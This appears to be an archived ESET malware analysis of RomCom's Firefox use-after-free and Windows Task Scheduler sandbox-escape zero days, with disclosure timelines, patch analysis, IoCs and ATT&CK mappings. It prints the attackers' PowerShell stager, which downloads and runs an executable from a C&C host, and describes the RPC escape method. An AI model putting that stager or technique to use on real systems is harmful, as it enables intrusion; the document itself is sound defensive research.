{
	"id": "25ea8725-9dae-4f8c-a39e-d02a62e5b998",
	"created_at": "2026-04-06T00:16:13.61931Z",
	"updated_at": "2026-04-10T13:12:17.186591Z",
	"deleted_at": null,
	"sha1_hash": "18f0b50c0651fbcca086d2a1154c5e0af48d9ca5",
	"title": "RomCom exploits Firefox and Windows zero days in the wild",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1072571,
	"plain_text": "RomCom exploits Firefox and Windows zero days in the wild\r\nBy Damien Schaeffer and Romain Dumont\r\nArchived: 2026-04-05 16:54:46 UTC\r\nESET researchers discovered a previously unknown vulnerability in Mozilla products, exploited in the wild by Russia-aligned group RomCom. This is at least the second time that RomCom has been caught exploiting a significant zero-day vulnerability in the wild, after the abuse of CVE-2023-36884 via Microsoft Word in June 2023.\r\nThis critical vulnerability, assigned CVE-2024-9680 with a CVSS score of 9.8, allows vulnerable versions of Firefox, Thunderbird, and the Tor Browser to execute code in the restricted context of the browser. Chained with another previously unknown vulnerability in Windows, assigned CVE-2024-49039 with a CVSS score of 8.8, arbitrary code can be executed in the context of the logged-in user. In a successful attack, if a victim browses to a web page containing the exploit, an adversary can run arbitrary code – without any user interaction required – which in this case led to the installation of RomCom’s eponymous backdoor on the victim’s computer.\r\nKey points of this blogpost:\r\nOn October 8th, 2024, ESET researchers discovered a previously unknown zero-day vulnerability in Mozilla products being exploited in the wild.\r\nAnalysis of the exploit led to the discovery of the vulnerability, now assigned CVE-2024-9680: a use-after-free bug in the animation timeline feature in Firefox. Mozilla patched the vulnerability on October 9th, 2024.\r\nFurther analysis revealed another zero-day vulnerability in Windows: a privilege escalation bug, now assigned CVE‑2024‑49039, that allows code to run outside of Firefox’s sandbox. Microsoft released a patch for this second vulnerability on November 12th, 2024.\r\nSuccessful exploitation attempts delivered the RomCom backdoor, in what looks like a widespread campaign.\r\nRomCom (also known as Storm-0978, Tropical Scorpius, or UNC2596) is a Russia-aligned group that conducts both opportunistic campaigns against selected business verticals and targeted espionage operations. The group’s focus has shifted to include espionage operations collecting intelligence, in parallel with its more conventional cybercrime operations. The backdoor used by the group is capable of executing commands and downloading additional modules to the victim’s machine.\r\nTable 1 shows the sectors targeted, according to our research, by RomCom in 2024. This highlights that the group is engaged in espionage but also cybercrime operations.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 1 of 20\r\nTable 1. RomCom victims in 2024\r\nVertical and region\tPurpose\tFirst seen\r\nGovernmental entity in Ukraine\tEspionage\t2024-01\r\nPharmaceutical sector in the US\tCybercrime\t2024-03\r\nLegal sector in Germany\tCybercrime\t2024-03\r\nInsurance sector in the US\tCybercrime\t2024-04\r\nDefense sector in Ukraine\tEspionage\t2024-08\r\nEnergy sector in Ukraine\tEspionage\t2024-08\r\nGovernmental entities in Europe\tEspionage\t2024-08\r\nWorldwide targeting – Firefox exploit\tUnknown\t2024-10\r\nCompromise chain\r\nThe compromise chain is composed of a fake website that redirects the potential victim to the server hosting the exploit, and should the exploit succeed, shellcode is executed that downloads and executes the RomCom backdoor – an example of which is depicted in Figure 1. While we don’t know how the link to the fake website is distributed, if the page is reached using a vulnerable browser, a payload is dropped and executed on the victim’s computer with no user interaction required. Finally, a JavaScript redirection is performed using window.location.href after a few seconds, giving the exploit time to run.\r\nFigure 1. Exploit chain to compromise the victim\r\nFrom October 10th, 2024 to October 16th, 2024, just after the first vulnerability was patched, we found other C\u0026C servers hosting the exploit. They used a recurring naming scheme for their fake servers by adding the prefix or suffix redir or red to a legitimate domain, sometimes also changing its top-level domain (TLD), as shown in Table 2. The redirection at the end of the exploitation attempt took the victims to the legitimate website at the original domain name, presumably to avoid raising the targets’ suspicions.\r\nTable 2. Fake servers redirecting to the exploit\r\nFirst seen\tFake server\tFinal redirect to\tRedirect website purpose\r\n2024-10-10\tredircorrectiv[.]com\tcorrectiv.org\tNonprofit independent newsroom.\r\n2024-10-14\tdevolredir[.]com\tdevolutions.net\tRemote access and password management solutions.\r\n2024-10-15\tredirconnectwise[.]cloud\tconnectwise.com\tMSP technology and IT management software.\r\n2024-10-16\tredjournal[.]cloud\tconnectwise.com\tMSP technology and IT management software.\r\nIf a victim using a vulnerable browser visits a web page serving this exploit, the vulnerability is triggered and shellcode is executed in a content process. The shellcode is composed of two parts: the first retrieves the second from memory and marks the containing pages as executable, while the second implements a PE loader based on the open-source project Shellcode Reflective DLL Injection (RDI).\r\nThe loaded library implements a sandbox escape for Firefox that leads to downloading and executing the RomCom backdoor on the victim’s computer. The backdoor is staged at a C\u0026C server located at journalctd[.]live, correctiv[.]sbs, or cwise[.]store, depending on the sample.\r\nAccording to our telemetry, from October 10th, 2024 to November 4th, 2024, potential victims who visited websites hosting the exploit were located mostly in Europe and North America, as shown in Figure 2. The number of potential targets runs from a single victim per country to as many as 250, according to ESET telemetry.\r\nFigure 2. Heatmap of potential victims\r\nCVE-2024-9680: Use-after-free in Firefox animation timeline\r\nOn October 8th, 2024, we found interesting files used to deliver the RomCom backdoor, hosted on the server 1drv.us[.]com controlled by the threat actor. The exploits target a use-after-free vulnerability in Firefox animation timelines, allowing an attacker to achieve code execution in a content process. During our investigation, we analyzed the files referenced in Table 3.\r\nTable 3. Files related to the exploit\r\nName\tDescription\r\nmain-128.js\tJavaScript file containing the exploit for versions of Firefox from 106 to 128.\r\nmain-129.js\tJavaScript file containing the exploit for versions of Firefox from 129 to 131.\r\nmain-tor.js\tJavaScript file containing the exploit for Tor Browser versions 12 and 13.\r\nscript.js\tJavaScript file used to generate a CAPTCHA.\r\nutils.js\tJavaScript file containing helper functions, e.g., to convert data types, or to get the OS type or browser version.\r\nanimation0.html\tHTML iframe loaded by the exploit to trigger the use-after-free vulnerability.\r\nindex.html\tHTML page loading the exploit and redirecting to a legitimate website after a few seconds.\r\nTimestamps related to these files indicate that they were created on October 3rd, 2024 and made available online; nevertheless, the threat actor might have been in possession of this exploit earlier than this.\r\nWe reported the vulnerability to Mozilla shortly after discovery, with the following timeline of events:\r\n2024-10-08: Discovery and initial analysis.\r\n2024-10-08: Vulnerability reported to Mozilla.\r\n2024-10-08: Vulnerability acknowledged by Mozilla.\r\n2024-10-09: CVE-2024-9680 assigned by Mozilla Corporation.\r\n2024-10-09: Vulnerability patched in Firefox, Security Advisory 2024-51.\r\n2024-10-09: Vulnerability patched in Tor Browser with release 13.5.7.\r\n2024-10-10: Vulnerability patched in Tails with release 6.8.1.\r\n2024-10-10: Vulnerability patched in Thunderbird, Security Advisory 2024-52.\r\nWe would like to thank the team at Mozilla for being very responsive and highlight their impressive work to release a patch within a day.\r\nMozilla and the Tor Project released a patch that fixes the vulnerability in the following versions:\r\nFirefox 131.0.2\r\nFirefox ESR 115.16.1\r\nFirefox ESR 128.3.1\r\nTor Browser 13.5.7\r\nTails 6.8.1\r\nThunderbird 115.16\r\nThunderbird 128.3.1\r\nThunderbird 131.0.1\r\nDuring the preparation of this blogpost, independent researcher Dimitri Fourny released a detailed analysis of the vulnerability on November 14th, 2024.\r\nRoot cause analysis\r\nThe main-\u003cFirefox version\u003e.js first checks the exact version of the browser, and determines its exploitability by checking some specific objects’ offsets and sizes for an affected version. If these checks pass, it proceeds to add an HTML iframe into the exploit page, implemented in animation0.html. The latter creates four HTML div elements identified respectively as target0 to target3, but most importantly it defines a getter function for the Object.prototype’s then property as shown in Figure 3. This function will trigger the use-after-free vulnerability as explained below. Note that the comments (in dark green) are from the exploit authors; this could indicate that the exploit was still in a developmental phase or that the threat actor bought it.\r\nFigure 3. The JavaScript exploit defines the then property’s getter function on every object, triggering a use-after-free vulnerability\r\nAfter some initial heap spraying, the prepare function creates four Animation objects, one for each div element previously created, as illustrated in Figure 4. These animation objects are handled by an AnimationTimeline object.\r\nFigure 4. The exploit code creates animation objects for div elements\r\nDuring the document animation timeline, the test function is called, which pauses and gets the ready property of the first and second animation objects. As stated in the documentation, the ready property returns a Promise that resolves when the animation is ready to be played. Calling the then method on the promise causes the getter function shown in Figure 3 to be called. Essentially, this function increments a global flag variable and when it reaches 2, the first animation object (anim0) is cancelled, and all the div elements are removed. The call to the rm0 function (shown in Figure 3) sets the animation objects to null in order to free them, which triggers the use-after-free vulnerability. This function also does some heap feng shui and, in the initially discovered exploit, calls the getInfo function responsible for achieving code execution.\r\nIn the meantime, as the animation0.html document is being refreshed, the Tick method of its AnimationTimeline object is called periodically. As seen in Figure 5, this method iterates over the different animation objects present in the animation timeline and appends animations to be removed to a local array variable called animationsToRemove.\r\nFigure 5. In AnimationTimeline::Tick, animation objects to be removed are appended to local array variable animationsToRemove\r\nThe bug lies in that, while iterating over the different animation objects of the animation timeline, the Tick method of the Animation object is called, which can lead to the freeing of the current animation object, resulting in handling a dangling pointer. While debugging the exploit, we observed a sequence of calls that eventually ended up in the getter function explained above, as illustrated in Figure 6 and Figure 7.\r\nFigure 6. Call stack of the animation being cancelled by the getter function called via the Animation::Tick method\r\nFigure 7. The Animation::PauseAt method ends up calling the getter function\r\nThe getter function calls Animation::Cancel which in turn calls AnimationTimeline::RemoveAnimation. Then, the animation objects anim0 and anim1 are set to null in order for them to get freed. When AnimationTimeline::Tick then iterates over the array animationsToRemove (line 74 in Figure 5), AnimationTimeline::RemoveAnimation will manipulate a dangling pointer of an Animation object that was already removed, as shown in Figure 8.\r\nFigure 8. Call stack of the crash in AnimationTimeline::RemoveAnimation while manipulating a dangling pointer\r\nAfter freeing the animations in the rm0 function, the exploit proceeds with more heap management in order to control the objects that will replace the freed animations, and finally, the getInfo function is called, as seen in Figure 9.\r\nFigure 9. Exploit code function rm0 triggers the use-after-free bug and exploits it\r\nWithout going into too much detail about the exploit code, its author abused div objects and their attributes as well as ImageData objects to leak properties of the latter, as observed in Figure 10.\r\nFigure 10. Exploit code getInfo function attempts to leak an ImageData object\r\nThen, the exploit code proceeds to manipulate ArrayBuffer objects so as to leak the address of an arbitrary JavaScript object (known as an addrof primitive) and abuse the Firefox JIT compiler to execute the first shellcode component in the context of a content process, as illustrated in Figure 11. This technique is explained in great detail in this blogpost.\r\nFigure 11. The exploit code abuses the Firefox JIT compiler to execute shellcode\r\nMozilla patched the vulnerability in Firefox 131.0.2, Firefox ESR 128.3.1, and Firefox ESR 115.16.1 on October 9th, 2024. Essentially, the pointers to the animation objects handled by the timeline are now implemented through reference-counting pointers (RefPtr), as suggested by the diff, which prevents the animations from being freed, since AnimationTimeline::Tick will still hold a reference to them.\r\nShellcode analysis\r\nBoth shellcodes are stored in the JavaScript exploit file main-\u003cFirefox version\u003e.js. The first one is dynamically created as an array of float numbers while the second one is stored as a huge array of bytes.\r\nEgghunting shellcode\r\nThis first shellcode simply retrieves the second shellcode by searching in memory for a hardcoded magic value of 0x8877665544332211, changes its memory protection to read-write-execute (RWX), and executes the code located at this address.\r\nReflective loader shellcode\r\nThis second shellcode is the compiled version of the Shellcode RDI project, which enables a DLL to be loaded. The constants used in the shellcode were not changed by the threat actor (see https://github.com/monoxgas/sRDI/blob/master/Native/Loader.cpp#L367 vs. the constants shown in Figure 12).\r\nFigure 12. The constants used in the public Shellcode RDI project remained unchanged\r\nThe shellcode simply loads an embedded library whose sole purpose is to escape the restrictions of Firefox’s sandboxed content process.\r\nCVE-2024-49039: Privilege escalation in Windows Task Scheduler\r\nThe loaded library (SHA1: ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6), named PocLowIL by its developers and compiled on October 3rd, 2024, implements a sandbox escape from the untrusted process level of the content process to a medium level. Essentially, the library makes use of an undocumented RPC endpoint, which should not have been callable from an untrusted process level, to launch a hidden PowerShell process that downloads a second stage from a C\u0026C server.\r\nThe timeline of the vulnerability disclosure is the following:\r\n2024-10-08: As part of our initial report to Mozilla for CVE-2024-9680, we also provided what we believed to be a sandbox escape.\r\n2024-10-14: Mozilla’s security team confirmed the sandbox escape and deemed the vulnerability to be tied to a Windows security flaw. They advised us that they had contacted the Microsoft Security Response Center (MSRC) to assess the vulnerability.\r\n2024-11-12: Microsoft released an advisory for CVE-2024-49039 and its corresponding patch through the update KB5046612. The vulnerability was also independently found by Vlad Stolyarov and Bahare Sabouri of Google’s Threat Analysis Group, as mentioned in KB5046612.\r\nRoot cause analysis\r\nThe sandbox escape code resides in the relatively small main function of the library. It makes use of an undocumented RPC endpoint, as illustrated in Figure 13.\r\nFigure 13. The PocLowIL library prepares to interact with a task-related endpoint\r\nThe function proceeds to populate undocumented structures and calls NdrClientCall2 three times. The first parameter passed to this function, pStubDescriptor, is a MIDL_STUB_DESC structure whose RpcInterfaceInformation member points to an interface identified by the GUID 33D84484-3626-47EE-8C6F-E7E98B113BE1. This interface is implemented in the Windows library WPTaskScheduler.dll, loaded by schedsvc.dll, hosted in the process of the task scheduler service (svchost.exe).\r\nAccording to our analysis of this interface, the sandbox escape code calls the following functions:\r\ns_TaskSchedulerCreateSchedule\r\ns_TaskSchedulerExecuteSchedule\r\ns_TaskSchedulerDeleteSchedule (used only for cleanup)\r\nUsing RpcView and after partially reversing some structures, we figured out the main structures, as illustrated in Figure 14.\r\nFigure 14. The main structures used to create a scheduled task through the RPC interface\r\nAfter applying these structures in IDA Pro, we obtained a clearer overview of the task, as seen in Figure 15.\r\nFigure 15. IDA Pro pseudocode view of the sandbox escape code\r\nBased on the code, the malicious library creates a scheduled task that will run an arbitrary application at medium integrity level, allowing the attackers to elevate their privileges on the system and break out of the sandbox. This is possible due to the lack of restrictions imposed on the security descriptor applied to the RPC interface during its creation, as illustrated in Figure 16.\r\nFigure 16. Permissive security descriptor applied to the RPC interface\r\nThe renamed variable interface_security_descriptor, used when RpcServerRegisterIf3 is called, has the following value: D:P(A;;GA;;;S-1-15-2-1)(A;;GA;;;WD). According to the Security Descriptor Definition Language (SDDL), it allows everyone (WD) to communicate with the RPC interface and call its procedures regardless of their integrity level.\r\nExploitation\r\nIn this case, the threat actor created a task named firefox.exe that will launch conhost.exe in headless mode in order to hide the child process window. The deobfuscation of the rest of the command line (shown in Figure 15) revealed the PowerShell code seen in Figure 17.\r\n$a=$env:public + '\\\\public';\r\nInvoke-WebRequest https://journalctd[.]live/JfWb4OrQPLh -o $a;\r\nsleep 15;\r\nRename-Item $a ($a = ($a + '.exe')) # $env:public\\public.exe\r\nStart-Process $a;\r\nsleep 10;\r\nRename-Item $a ($a = ($a -replace 'public.e', 'epublic.e')) # $env:public\\epublic.exe\r\nStart-Process $a\r\nFigure 17. PowerShell code downloading a next-stage component\r\nAn executable is downloaded from https://journalctd[.]live/JfWb4OrQPLh, stored in the %PUBLIC% folder as public.exe, and run. After 10 seconds, it is renamed as epublic.exe and run again.\r\nBrief patch analysis\r\nThe patched version of WPTaskScheduler.dll (version 10.0.19041.5129) released with KB5046612 makes use of a more complicated security descriptor, as shown in Figure 18.\r\nFigure 18. The security descriptor introduced by the patch is more restrictive\r\nThe new security descriptor is:\r\nD:(A;;GRGWGX;;;SY)(A;;GRGWGX;;;LS)(A;;GR;;;NS)(A;;GR;;;IU)S:(ML;;NWNXNR;;;ME)\r\nBreaking down the string reveals the following restriction logic:\r\nthe system (SY) and local service (LS) accounts are granted read, write, and execute access,\r\nthe network service (NS) account and interactive users (IU) are granted only read access,\r\nlastly, objects below medium level (ME) integrity are denied read, write, and execute access.\r\nThe new restrictions imposed by the updated security descriptor prevent the privilege escalation and render the sandbox escape code obsolete.\r\nConclusion\r\nChaining together two zero-day vulnerabilities armed RomCom with an exploit that requires no user interaction. This level of sophistication shows the threat actor’s will and means to obtain or develop stealthy capabilities.\r\nESET shared detailed findings with Mozilla, following our coordinated vulnerability disclosure process shortly after discovery. Mozilla released a blogpost about how they reacted to the disclosure and were able to release a fix within 25 hours, which is very impressive in comparison to industry standards.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1\tFilename\tDetection\tDescription\r\nA4AAD0E2AC1EE0C8DD25968FA4631805689757B6\tutils.js\tJS/Exploit.Agent.NSF\tRomCom Firefox exploit.\r\nCA6F8966A3B2640F49B19434BA8C21832E77A031\tmain-tor.js\tJS/Exploit.Agent.NSE\tRomCom Firefox exploit.\r\n21918CFD17B378EB4152910F1246D2446F9B5B11\tmain-128.js\tJS/Exploit.Agent.NSE\tRomCom Firefox exploit.\r\n703A25F053E356EB6ECE4D16A048344C55DC89FD\tmain-129.js\tJS/Exploit.Agent.NSE\tRomCom Firefox exploit.\r\nABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6\tPocLowIL.dll\tWin64/Runner.AD\tRomCom Firefox sandbox escape.\r\nA9D445B77F6F4E90C29E385264D4B1B95947ADD5\tPocLowIL.dll\tWin64/Runner.AD\tRomCom Tor browser sandbox escape.\r\nNetwork\r\nIP\tDomain\tHosting provider\tFirst seen\tDetails\r\n194.87.189[.]171\tjournalctd[.]live\tAeza International LTD\t2024-10-08\tRomCom second-stage C\u0026C server.\r\n178.236.246[.]241\tcorrectiv[.]sbs\tAEZA INTERNATIONAL LTD\t2024-10-09\tRomCom second-stage C\u0026C server.\r\n62.60.238[.]81\tcwise[.]store\tAEZA INTERNATIONAL LTD\t2024-10-15\tRomCom second-stage C\u0026C server.\r\n147.45.78[.]102\tredircorrectiv[.]com\tAEZA INTERNATIONAL LTD\t2024-10-10\tRomCom exploit delivery C\u0026C server.\r\n46.226.163[.]67\tdevolredir[.]com\tAEZA INTERNATIONAL LTD\t2024-10-14\tRomCom exploit delivery C\u0026C server.\r\n62.60.237[.]116\tredirconnectwise[.]cloud\tAEZA INTERNATIONAL LTD\t2024-10-15\tRomCom exploit delivery C\u0026C server.\r\n62.60.237[.]38\tredjournal[.]cloud\tAEZA INTERNATIONAL LTD\t2024-10-16\tRomCom exploit delivery C\u0026C server.\r\n194.87.189[.]19\t1drv.us[.]com\tAEZA INTERNATIONAL LTD\t2024-10-08\tRomCom malware delivery C\u0026C server.\r\n45.138.74[.]238\teconomistjournal[.]cloud\tAEZA INTERNATIONAL LTD\t2024-10-16\tRomCom exploit redirection C\u0026C server.\r\n176.124.206[.]88\tN/A\tAEZA INTERNATIONAL LTD\t2024-10-08\tRomCom second-stage C\u0026C server.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 16 of the MITRE ATT\u0026CK framework.\r\nTactic\tID\tName\tDescription\r\nResource Development\tT1583\tAcquire Infrastructure\tRomCom sets up VPSes and buys domain names.\r\nResource Development\tT1587.001\tDevelop Capabilities: Malware\tRomCom develops malware in multiple programming languages.\r\nResource Development\tT1587.004\tDevelop Capabilities: Exploits\tRomCom may develop exploits used for initial compromise.\r\nResource Development\tT1588.003\tObtain Capabilities: Code Signing Certificates\tRomCom obtains valid code-signing certificates to sign its malware.\r\nResource Development\tT1588.005\tObtain Capabilities: Exploits\tRomCom may acquire exploits used for initial compromise.\r\nResource Development\tT1588.006\tObtain Capabilities: Vulnerabilities\tRomCom may obtain information about vulnerabilities it uses for targeting victims.\r\nResource Development\tT1608\tStage Capabilities\tRomCom stages malware on multiple delivery servers.\r\nInitial Access\tT1189\tDrive-by Compromise\tRomCom compromises victims through a user visiting a website hosting an exploit.\r\nExecution\tT1053.005\tScheduled Task/Job: Scheduled Task\tRomCom creates a scheduled task using RPC to execute the next stage downloader.\r\nPersistence\tT1546.015\tEvent Triggered Execution: Component Object Model Hijacking\tThe RomCom backdoor hijacks DLLs loaded by explorer.exe or wordpad.exe for persistence.\r\nPrivilege Escalation\tT1068\tExploitation for Privilege Escalation\tRomCom exploits a vulnerability to escape the Firefox sandbox.\r\nDefense Evasion\tT1622\tDebugger Evasion\tThe RomCom backdoor detects debuggers by registering an exception handler.\r\nDefense Evasion\tT1480\tExecution Guardrails\tThe RomCom backdoor checks whether the system state is suitable for execution.\r\nDefense Evasion\tT1027.011\tObfuscated Files or Information: Fileless Storage\tThe RomCom backdoor is stored encrypted in the registry.\r\nDefense Evasion\tT1553.002\tSubvert Trust Controls: Code Signing\tThe RomCom backdoor weakens security mechanisms by using trusted code-signing certificates.\r\nCredential Access\tT1555.003\tCredentials from Password Stores: Credentials from Web Browsers\tThe RomCom backdoor collects passwords, cookies, and sessions using a browser stealer module.\r\nCredential Access\tT1552.001\tUnsecured Credentials: Credentials In Files\tThe RomCom backdoor collects passwords using a file reconnaissance module.\r\nDiscovery\tT1087\tAccount Discovery\tThe RomCom backdoor collects username, computer, and domain data.\r\nDiscovery\tT1518\tSoftware Discovery\tThe RomCom backdoor collects information about installed software and versions.\r\nDiscovery\tT1614\tSystem Location Discovery\tThe RomCom backdoor checks for a specific keyboard layout ID (KLID).\r\nLateral Movement\tT1021\tRemote Services\tThe RomCom backdoor creates SSH tunnels to move laterally within compromised networks.\r\nCollection\tT1560\tArchive Collected Data\tThe RomCom backdoor stores data in a ZIP archive for exfiltration.\r\nCollection\tT1185\tMan in the Browser\tThe RomCom backdoor steals browser cookies, history, and saved passwords.\r\nCollection\tT1005\tData from Local System\tThe RomCom backdoor collects specific file types based on file extensions.\r\nCollection\tT1114.001\tEmail Collection: Local Email Collection\tThe RomCom backdoor collects files with .msg, .eml, and .email extensions.\r\nCollection\tT1113\tScreen Capture\tThe RomCom backdoor takes screenshots of the victim’s computer.\r\nCommand and Control\tT1071.001\tStandard Application Layer Protocol: Web Protocols\tThe RomCom backdoor uses HTTP or HTTPS as a C\u0026C protocol.\r\nCommand and Control\tT1573.002\tEncrypted Channel: Asymmetric Cryptography\tThe RomCom backdoor encrypts communication using SSL certificates.\r\nExfiltration\tT1041\tExfiltration Over Command-and-Control Channel\tThe RomCom backdoor exfiltrates data using the HTTPS C\u0026C channel.\r\nImpact\tT1565\tData Manipulation\tRomCom manipulates systems and steals data.\r\nImpact\tT1657\tFinancial Theft\tRomCom compromises companies for financial interest.\r\nSource: https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/"
	],
	"report_names": [
		"romcom-exploits-firefox-and-windows-zero-days-in-the-wild"
	],
	"threat_actors": [
		{
			"id": "fecc0d5a-3654-425d-9290-b6d0b4105463",
			"created_at": "2023-10-17T02:00:08.330061Z",
			"updated_at": "2026-04-10T02:00:03.37711Z",
			"deleted_at": null,
			"main_name": "Void Rabisu",
			"aliases": [
				"Tropical Scorpius"
			],
			"source_name": "MISPGALAXY:Void Rabisu",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "555e2cac-931d-4ad4-8eaa-64df6451059d",
			"created_at": "2023-01-06T13:46:39.48103Z",
			"updated_at": "2026-04-10T02:00:03.342729Z",
			"deleted_at": null,
			"main_name": "RomCom",
			"aliases": [
				"UAT-5647",
				"Storm-0978"
			],
			"source_name": "MISPGALAXY:RomCom",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d58052ba-978b-4775-985a-26ed8e64f98c",
			"created_at": "2023-09-07T02:02:48.069895Z",
			"updated_at": "2026-04-10T02:00:04.946879Z",
			"deleted_at": null,
			"main_name": "Tropical Scorpius",
			"aliases": [
				"DEV-0978",
				"RomCom",
				"Storm-0671",
				"Storm-0978",
				"TA829",
				"Tropical Scorpius",
				"UAC-0180",
				"UNC2596",
				"Void Rabisu"
			],
			"source_name": "ETDA:Tropical Scorpius",
			"tools": [
				"COLDDRAW",
				"Cuba",
				"Industrial Spy",
				"PEAPOD",
				"ROMCOM",
				"ROMCOM RAT",
				"SingleCamper",
				"SnipBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4f56bb34-098d-43f6-a0e8-99616116c3ea",
			"created_at": "2024-06-19T02:03:08.048835Z",
			"updated_at": "2026-04-10T02:00:03.870819Z",
			"deleted_at": null,
			"main_name": "GOLD FLAMINGO",
			"aliases": [
				"REF9019 ",
				"Tropical Scorpius ",
				"UAC-0132 ",
				"UAC0132 ",
				"UNC2596 ",
				"Void Rabisu "
			],
			"source_name": "Secureworks:GOLD FLAMINGO",
			"tools": [
				"Chanitor",
				"Cobalt Strike",
				"Cuba",
				"Meterpreter",
				"Mimikatz",
				"ROMCOM RAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434573,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18f0b50c0651fbcca086d2a1154c5e0af48d9ca5.pdf",
		"text": "https://archive.orkl.eu/18f0b50c0651fbcca086d2a1154c5e0af48d9ca5.txt",
		"img": "https://archive.orkl.eu/18f0b50c0651fbcca086d2a1154c5e0af48d9ca5.jpg"
	}
}